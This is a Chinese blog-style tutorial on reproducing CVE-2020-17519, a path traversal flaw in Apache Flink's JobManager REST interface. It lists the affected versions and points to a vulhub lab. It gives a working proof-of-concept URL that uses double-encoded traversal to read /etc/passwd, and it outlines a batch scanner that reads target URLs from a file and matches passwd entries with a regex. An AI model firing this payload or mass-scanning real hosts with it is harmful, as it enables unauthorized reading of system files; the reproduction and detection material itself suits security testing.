温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现

发布时间:2021-12-28 20:17:14 来源:亿速云 阅读:189 作者:柒染 栏目:安全技术

今天就跟大家聊聊有关如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

Apache Flink 是高效和分布式的通用数据处理平台。

Apache Flink 声明式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的编程和扩展性,具有强大的流处理和批处理功能。同时在并行数据库发现查询优化方案。

要求
Unix 类环境(Linux, Mac OS X, Cygwin)

git

Maven (at least version 3.0.4)

Java 6, 7 or 8 (Note that Oracle's JDK 6 library will fail to build Flink, but is able to run a pre-compiled package without problem)

git clone https://github.com/apache/incubator-flink.git
cd incubator-flink
mvn clean package -DskipTests # this will take up to 5 minutes

Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

从官方文档来看 只能在UINX系统运行

影响版本:
1.11.0
1.11.1
1.11.2

Docker地址:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

POC:

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现

Python批量检测脚本:

提供下正则:

pattern=re.compile(
                r"((root|bin|daemon|sys|sync|games|man|mail|news|www-data|uucp|backup|list|proxy|gnats|nobody"
                r"|syslog|mysql"
                r"|bind|ftp|sshd|postfix):[\d\w\-\s,]+:\d+:\d+:[\w\-_\s,]*:[\w\-_\s,\/]*:[\w\-_,"
                r"\/]*[\r\n])")


            re_html=pattern.findall(html)

本地新建host.txt
放入要检测的url回车分割
逐行读取
如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现

看完上述内容,你们对如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI